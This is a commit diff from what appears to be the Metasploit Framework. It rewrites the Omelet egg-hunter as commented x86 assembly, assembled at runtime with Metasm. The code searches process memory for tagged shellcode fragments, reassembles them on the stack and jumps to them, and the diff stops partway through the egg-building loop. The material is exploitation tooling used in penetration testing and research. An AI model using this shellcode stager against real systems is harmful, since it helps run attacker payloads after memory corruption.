another omelet update from Peter, this time with in-line assembly

git-svn-id: file:///home/svn/framework3/trunk@10118 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-23 21:03:00 +00:00
parent bd96c10cc0
commit b6577681c6
2 changed files with 106 additions and 50 deletions


@ -40,7 +40,7 @@ module Exploit::Omelet
larch = larch[0] if (larch.kind_of?(Array)) larch = larch[0] if (larch.kind_of?(Array))
if los.nil? if los.nil?
raise RuntimeError, "No platform restrictions were specified -- cannot select egghunter" raise RuntimeError, "No platform restrictions were specified -- cannot select omelet hunter"
end end
omelet = Rex::Exploitation::Omelet.new(los, larch) omelet = Rex::Exploitation::Omelet.new(los, larch)


@ -1,5 +1,7 @@
require 'rex/text' require 'rex/text'
require 'rex/arch' require 'rex/arch'
require 'metasm'
module Rex module Rex
module Exploitation module Exploitation
@ -89,66 +91,120 @@ class Omelet
nr_eggs = nr_eggs+1 nr_eggs = nr_eggs+1
end end
nr_eggs_hex = "%02x" % nr_eggs
eggsize_hex = "%02x" % eggsize
hextag = ""
eggtag.split('').each do | thischar |
decchar = "%02x" % thischar[0]
hextag = decchar + hextag
end
hextag = hextag + "01"
# create omelet code # create omelet code
the_omelet = "\xeb\x24" + omelet_hunter = <<EOS
"\x54\x5f" +
"\x66\x81\xcf\xff\xff" +
"\x89\xfa" +
"\x31\xc0" +
"\xb0" + nr_eggs.chr +
"\x31\xf6" +
"\x66\xbe" + (237-eggsize).chr + "\xff" +
"\x4f\x46" +
"\x66\x81\xfe\xff\xff" +
"\x75\xf7" +
"\x48" +
"\x75\xee" +
"\x31\xdb" +
"\xb3" + (nr_eggs+1).chr +
"\xc3" +
"\xe8\xd7\xff\xff\xff" +
"\xeb\x04" +
"\x4a\x4a\x4a\x4a" +
"\x42" +
"\x52" +
"\x6a\x02" +
"\x58" +
"\xcd\x2e" +
"\x3c\x05" +
"\x5a" +
"\x74\xf4" +
"\xb8\x01" + eggtag +
"\x01\xd8" +
"\x87\xfa" +
"\xaf" +
"\x87\xfa" +
"\x75\xe2" +
"\x89\xd6" +
"\x31\xc9" +
"\xb1" + eggsize.chr +
"\xf3\xa4" +
"\x4b" +
"\x80\xfb\x01" +
"\x75\xd4" +
"\xe8\xa4\xff\xff\xff" +
"\xff\xe7"
nr_eggs equ 0x#{nr_eggs_hex} ; number of eggs
egg_size equ 0x#{eggsize_hex} ; nr bytes of payload per egg
hex_tag equ 0x#{hextag} ; tag
jmp start
; routine to calculate the target location
; for writing recombined shellcode (omelet)
; I'll use EDI as target location
; First, I'll make EDI point to end of stack
; and I'll put the number of shellcode eggs in eax
get_target_loc:
push esp ; get stack pointer and put it in EDI
pop edi ; set EDI to end of stack
or di,0xffff ; edi=0x....ffff = end of current stack frame
mov edx,edi ; use edx as start location for the search
xor eax,eax ; zero eax
mov al,nr_eggs ; put number of eggs in eax
calc_target_loc:
xor esi,esi ; use esi as counter to step back
mov si,0-(egg_size+20) ; add 20 bytes of extra space, per egg
get_target_loc_loop: ; start loop
dec edi ; step back
inc esi ; and update ESI counter
cmp si,-1 ; continue to step back until ESI = -1
jnz get_target_loc_loop
dec eax ; loop again if we did not take all pieces
; into account yet
jnz calc_target_loc
; edi now contains target location
; for recombined shellcode
xor ebx,ebx ; put loop counter in ebx
mov bl,nr_eggs+1
ret
start:
call get_target_loc ; jump to routine which will calculate shellcode dst address
; start looking for eggs, using edx as basepointer
jmp search_next_address
find_egg:
dec edx ; scasd does edx+4, so dec edx 4 times
; + inc edx one time
; to make sure we don't miss any pointers
dec edx
dec edx
dec edx
search_next_address:
inc edx ; next ptr
push edx ; save edx
push 0x02
pop eax ; set eax to 0x02
int 0x2e
cmp al,0x5 ; address readable ?
pop edx ; restore edx
je search_next_address ; if addressss is not readable, go to next address
mov eax,hex_tag ; if address is readable, prepare tag in eax
add eax,ebx ; add offset (ebx contains egg counter, remember ?)
xchg edi,edx ; switch edx/edi
scasd ; edi points to the tag ?
xchg edi,edx ; switch edx/edi back
jnz find_egg ; if tag was not found, go to next address
;found the tag at edx
copy_egg:
; ecx must first be set to egg_size (used by rep instruction) and esi as source
mov esi,edx ; set ESI = EDX (needed for rep instruction)
xor ecx,ecx
mov cl,egg_size ; set copy counter
rep movsb ; copy egg from ESI to EDI
dec ebx ; decrement egg
cmp bl,1 ; found all eggs ?
jnz find_egg ; no = look for next egg
; done - all eggs have been found and copied
done:
call get_target_loc ; re-calculate location where recombined shellcode is placed
jmp edi ; and jump to it :)
EOS
the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
# create the eggs array # create the eggs array
eggs = Array.new(nr_eggs) eggs = Array.new(nr_eggs)
total_size = eggsize * nr_eggs total_size = eggsize * nr_eggs
padlen = total_size - payloadlen padlen = total_size - payloadlen
#print("Padlen : #{padlen}") payloadpadding = "A" * padlen
payloadpadding = ""
if padlen > 0 fullcode = payload + payloadpadding
payloadpadding = "A" * padlen eggcnt = nr_eggs + 2
end
fullcode = payload+payloadpadding
eggcnt = nr_eggs+2
startcode = 0 startcode = 0
arraycnt = 0 arraycnt = 0
while eggcnt > 2 do while eggcnt > 2 do
egg_prep = eggcnt.chr + eggtag egg_prep = eggcnt.chr + eggtag
this_egg = fullcode[startcode, eggsize] this_egg = fullcode[startcode, eggsize]